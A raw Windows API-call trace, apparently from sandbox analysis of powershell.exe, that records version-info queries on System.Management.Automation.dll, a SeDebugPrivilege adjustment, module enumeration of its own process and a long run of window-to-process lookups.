	[0374.301] lstrcpyW (in: lpString1=0x125530, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0374.302] CoTaskMemFree (pv=0x125530) 
	[0374.302] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x2c37644, puLen=0x28e020) returned 1
	[0374.302] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0374.302] CoTaskMemAlloc (cb=0x44) returned 0xb9860
	[0374.302] lstrcpyW (in: lpString1=0xb9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0374.302] CoTaskMemFree (pv=0xb9860) 
	[0374.302] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x2c376a8, puLen=0x28e020) returned 1
	[0374.302] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0374.302] CoTaskMemAlloc (cb=0x58) returned 0xd5490
	[0374.302] lstrcpyW (in: lpString1=0xd5490, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0374.302] CoTaskMemFree (pv=0xd5490) 
	[0374.302] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x2c37724, puLen=0x28e020) returned 1
	[0374.302] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0374.302] CoTaskMemAlloc (cb=0x20) returned 0x178a20
	[0374.302] lstrcpyW (in: lpString1=0x178a20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0374.302] CoTaskMemFree (pv=0x178a20) 
	[0374.302] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x2c373cc, puLen=0x28e020) returned 1
	[0374.302] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0374.303] CoTaskMemAlloc (cb=0x66) returned 0x164080
	[0374.303] lstrcpyW (in: lpString1=0x164080, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0374.303] CoTaskMemFree (pv=0x164080) 
	[0374.303] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x0, puLen=0x28e020) returned 0
	[0374.303] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x0, puLen=0x28e020) returned 0
	[0374.303] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x0, puLen=0x28e020) returned 0
	[0374.303] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28dff8, puLen=0x28dff0 | out: lplpBuffer=0x28dff8*=0x2c37374, puLen=0x28dff0) returned 1
	[0374.304] CoTaskMemAlloc (cb=0x204) returned 0x12b720
	[0374.304] VerLanguageNameW (in: wLang=0x0, szLang=0x12b720, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0374.305] CoTaskMemFree (pv=0x12b720) 
	[0374.306] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\", lplpBuffer=0x28e048, puLen=0x28e040 | out: lplpBuffer=0x28e048*=0x2c37300, puLen=0x28e040) returned 1
	[0374.311] GetCurrentProcessId () returned 0xaf4
	[0374.560] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x28cf70 | out: lpLuid=0x28cf70*(LowPart=0x14, HighPart=0)) returned 1
	[0374.563] GetCurrentProcess () returned 0xffffffffffffffff
	[0374.563] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x28cf90 | out: TokenHandle=0x28cf90*=0x2ec) returned 1
	[0374.564] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2c3ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0374.566] CloseHandle (hObject=0x2ec) returned 1
	[0374.569] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf4) returned 0x2ec
	[0374.578] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2c3abb8, cb=0x200, lpcbNeeded=0x28dfa8 | out: lphModule=0x2c3abb8, lpcbNeeded=0x28dfa8) returned 1
	[0374.580] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2c3ae28, cb=0x18 | out: lpmodinfo=0x2c3ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0374.581] CoTaskMemAlloc (cb=0x804) returned 0x17abb0
	[0374.582] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x17abb0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0374.582] CoTaskMemFree (pv=0x17abb0) 
	[0374.583] CoTaskMemAlloc (cb=0x804) returned 0x17abb0
	[0374.583] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x17abb0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0374.583] CoTaskMemFree (pv=0x17abb0) 
	[0374.584] CloseHandle (hObject=0x2ec) returned 1
	[0374.591] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xaf4) returned 0x2ec
	[0374.592] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x28e0d8 | out: lpExitCode=0x28e0d8*=0x103) returned 1
	[0374.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c3b088, Length=0x20000, ResultLength=0x28e0a0 | out: SystemInformation=0x12c3b088, ResultLength=0x28e0a0*=0x1fa90) returned 0x0
	[0375.129] EnumWindows (lpEnumFunc=0x27566ac, lParam=0x0) returned 1
	[0375.130] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.130] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x558
	[0375.130] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.130] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x538
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x778
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x778
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.131] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x460
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x1188
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x1148
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x1160
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x10fc
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xe34
	[0375.132] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xea4
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x514
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xe48
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xbc8
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xdf8
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x318
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xcac
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x8bc
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf9c
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf48
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xe40
	[0375.133] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xecc
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xeb8
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xe80
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xe98
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xe60
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xee4
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf00
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xdf0
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xe1c
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xdd0
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xd94
	[0375.134] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xd74
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xd00
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xcd8
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xc84
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xca4
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xc64
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xc24
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb84
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xbac
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x384
	[0375.135] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xab8
	[0375.136] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x33c
	[0375.136] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa44
	[0375.136] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa64
	[0375.136] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x8a8
	[0375.136] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xaf0
	[0375.137] GetWindow (hWnd=0x102c4, uCmd=0x4) returned 0x0
	[0375.137] IsWindowVisible (hWnd=0x102c4) returned 0
	[0375.138] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x88c
	[0375.138] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb04
	[0375.138] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x910
	[0375.138] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x230
	[0375.138] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xac0
	[0375.138] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xab4
	[0375.138] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xaac
	[0375.138] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x3d0
	[0375.138] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x978
	[0375.139] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa7c
	[0375.139] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x59c
	[0375.139] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa88
	[0375.139] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa6c
	[0375.139] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa68
	[0375.139] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x9f8
	[0375.139] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa04
	[0375.139] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x924
	[0375.139] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x8dc
	[0375.140] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x7dc
	[0375.140] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x768
	[0375.140] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x764
	[0375.140] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x820
	[0375.140] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x810
	[0375.140] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x794
	[0375.140] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x83c
	[0375.140] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x7ac
	[0375.141] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb44
	[0375.141] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb5c
	[0375.141] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x838
	[0375.141] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.147] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.147] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x818
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x5b8
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x494
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x1ec
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x440
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x7e8
	[0375.148] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x730
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x2c8
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x31c
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x330
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x128
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x5c8
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x6f8
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x358
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x73c
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb0
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x250
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x240
	[0375.149] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x790
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x61c
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x540
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x538
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x568
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x538
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x568
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x538
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x540
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x540
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x57c
	[0375.150] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x460
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x554
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x528
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x79c
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4e0
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.151] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x460
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x460
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x44c
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x778
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x460
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x558
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4d0
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x11ec
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x11e8
	[0375.152] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x11cc
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x1140
